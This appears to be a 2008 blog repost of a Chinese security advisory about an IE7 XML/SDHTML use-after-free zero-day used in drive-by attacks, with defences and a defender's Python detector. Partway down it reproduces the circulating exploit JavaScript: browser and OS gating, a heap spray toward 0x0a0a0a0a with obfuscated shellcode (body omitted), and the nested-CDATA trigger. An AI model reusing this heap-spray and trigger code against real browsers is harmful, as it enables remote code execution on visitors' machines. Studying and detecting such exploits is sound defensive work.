Thursday, December 11, 2008

IE7 Updates from blog.wang1.cn

UPDATE from http://blog.wang1.cn/?action=show&id=1233


IE7 0DAY attack code is already being used in drive-by (挂马) attacks

Posted by monk on 2008, December 10, 8:47 AM. Filed in Vulnerability Collection (漏洞收集整理)

# Guizai (鬼仔): the IE7 0day just released

Source: KnownSec (知道安全)

Given the severity of this vulnerability, and as Microsoft's domestic security service provider, we issued an advisory at the earliest opportunity, analysed the vulnerability details and submitted them to the relevant Microsoft departments; the specific details are not published here.

The KnownSec team recently captured malicious code that exploits an out-of-bounds memory access vulnerability in IE7. The vulnerability leaked within a small circle in November and was only fully for sale and circulating in the black market around December 9; someone has already rushed out a web-trojan (网马) generator, and we expect it to become very widespread in the short term.

When our monitoring system first captured this vulnerability, our team did not analyse it in detail. We assumed it was an already-patched vulnerability, and because we found many web trojans and code posts on the Internet we assumed it was not a 0DAY, so we pasted the circulating code and the drive-by page code into an internal share, from which it leaked out. This was our mistake :(

History:

IE7's XML handling contains a vulnerability that can lead to an out-of-bounds memory access; by crafting malformed XML and using JavaScript to place SHELLCODE, arbitrary code can be executed.

Rumours of an IE7 vulnerability began circulating in the second half of 2008; private sales started around October, it entered black-market trading in November, and people began negotiating sales in person.

It finally appeared on the Internet in December; large numbers of second- and third-hand copies of the vulnerability circulated at the operational level of the black industry, and from early December many people bought second-hand code to develop generators. On the 9th it began to appear in drive-by attacks.

Analysis:

Affected versions:

Systems:

WINDOWS XP

WINDOWS 2003

Browsers:

IE7

Description:

An error in object handling in SDHTML leads to memory corruption.
Under certain constructed conditions, SDHTML detects an error and frees an already-allocated object; but after freeing it SDHTML does not return and instead continues executing using the freed object's memory. If that memory has since been allocated for another purpose, SDHTML treats it as an object. The 0DAY drive-by page uses an XML SRC string object to occupy the space of the freed object, and since the object pointer includes function routine pointers, this ultimately leads to code execution.

Since the vulnerability has not yet been patched, please wait for the detailed reference in Microsoft's official patch release for the specific details.

Defense:

1. Watch Microsoft's official website and download the patch promptly.

2. Enable DEP protection:

System Properties > Advanced > Performance > Data Execution Prevention

This can prevent malicious attacks.

3. Add wwwwyyyyy.cn and sllwrnm5.cn to the HOSTS file to block them.

Copy the following lines into the HOSTS file:

127.0.0.1 wwwwyyyyy.cn

127.0.0.1 sllwrnm5.cn

buhu: adding a piece of exploit code
JavaScript code (line numbers stripped; the first line is missing from the post)


    // Only runs in IE7; any other browser is sent to a blank page.
    if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");

    // Busy-wait for the given number of milliseconds.
    function sleep(milliseconds)
    {
        var start=new Date().getTime();
        for(var i=0;i<1e7;i++)
        {
            if((new Date().getTime()-start)>milliseconds){break}
        }
    }

    // Heap spray: "dadong" stands in for "%u", so unescape() rebuilds the
    // payload; the heap is then filled with 1 MB blocks up to 0x0a0a0a0a.
    function spray(sc)
    {
        var infect=unescape(sc.replace(/dadong/g,"\x25\x75"));
        var heapBlockSize=0x100000;
        var payLoadSize=infect.length*2;
        var szlong=heapBlockSize-(payLoadSize+0x038);
        var retVal=unescape("%u0a0a%u0a0a");
        retVal=getSampleValue(retVal,szlong);
        aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;
        zzchuck=new Array();
        for(i=0;i<aaablk;i++){zzchuck[i]=retVal+infect}
    }

    // Doubles the filler string until it reaches szlong bytes, then trims it.
    function getSampleValue(retVal,szlong)
    {
        while(retVal.length*2<szlong){retVal+=retVal}
        retVal=retVal.substring(0,szlong/2);
        return retVal
    }

    var a1="dadong";
    spray(a1+"9090"+a1+"..."); // the long dadong-encoded shellcode string is omitted here

    sleep(3000);

    // Trigger only on IE7 running on Windows XP or Windows 2003.
    nav=navigator.userAgent.toLowerCase();
    if(navigator.appVersion.indexOf('MSIE')!=-1)
    {
        version=parseFloat(navigator.appVersion.split('MSIE')[1])
    }
    if(version==7)
    {
        w2k3=((nav.indexOf('windows nt 5.2')!=-1)||(nav.indexOf('windows 2003')!=-1));
        wxp=((nav.indexOf('windows nt 5.1')!=-1)||(nav.indexOf('windows xp')!=-1));
        // Trigger string reproduced as it appears in the post (spacing preserved).
        if(wxp||w2k3)document.write('< ! [ CDATA[< ! [ CDATA[>]]>');
        var i=1;
        while(i<=10)
        {
            window.status=" ";i++
        }
    }
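As an added defender's example (not code from the post, from buhu or from KnownSec), the following Python statically undoes the script's `dadong`-for-`%u` obfuscation and flags the heap-spray indicators visible in the code above, run over a constructed sample; `SAMPLE_JS`, the indicator names and the filler bytes in the sample are assumptions of this example.

```python
import re

# Constructed sample modelled on the drive-by page above (not the post's own
# code): the payload string uses a stand-in token for "%u", and the bytes in
# it are harmless filler for this example, not shellcode.
SAMPLE_JS = r'''
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank");
function spray(sc){
  var infect=unescape(sc.replace(/dadong/g,"\x25\x75"));
  var heapBlockSize=0x100000;
  var retVal=unescape("%u0a0a%u0a0a");
  aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;
}
spray("dadong9090dadong9090dadongC3C3");
document.write('< ! [ CDATA[< ! [ CDATA[>]]>');
'''

# The "%u" rebuild trick: replace(/token/g,"\x25\x75"), where \x25\x75 is "%u".
TOKEN_RE = re.compile(r'replace\(/(\w+)/g,\s*"\\x25\\x75"\)')

def extract_payload_token(js):
    """Return the stand-in token the script swaps for '%u' at runtime, or None."""
    m = TOKEN_RE.search(js)
    return m.group(1) if m else None

def decode_u_escapes(encoded, token):
    """Undo the obfuscation statically: token -> '%u', then each %uXXXX is one
    UTF-16 code unit stored little-endian, so 'dadong1234' -> bytes 34 12."""
    out = bytearray()
    for unit in re.findall(r'%u([0-9A-Fa-f]{4})', encoded.replace(token, '%u')):
        val = int(unit, 16)
        out += bytes([val & 0xFF, val >> 8])
    return bytes(out)

# Static indicators drawn from the spray routine above (names are this example's);
# each is weak alone, several together mark a page worth quarantining for analysis.
INDICATORS = {
    'ie7_gate': r'indexOf\("msie 7"\)',
    'percent_u_rebuild': TOKEN_RE.pattern,
    'unescape_spray': r'unescape\(',
    'megabyte_blocks': r'0x100000',
    'spray_target_address': r'0x0a0a0a0a|%u0a0a%u0a0a',
    'nested_cdata': r'(<\s*!\s*\[\s*CDATA\s*\[\s*){2}',
}

def spray_indicators(js):
    """Names of the indicators present in a page's script text."""
    return {name for name, pat in INDICATORS.items() if re.search(pat, js, re.IGNORECASE)}
```

Feeding the decoded bytes to a disassembler is the next step for an analyst; the token and indicator set are enough for a first-pass content filter.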




-EF
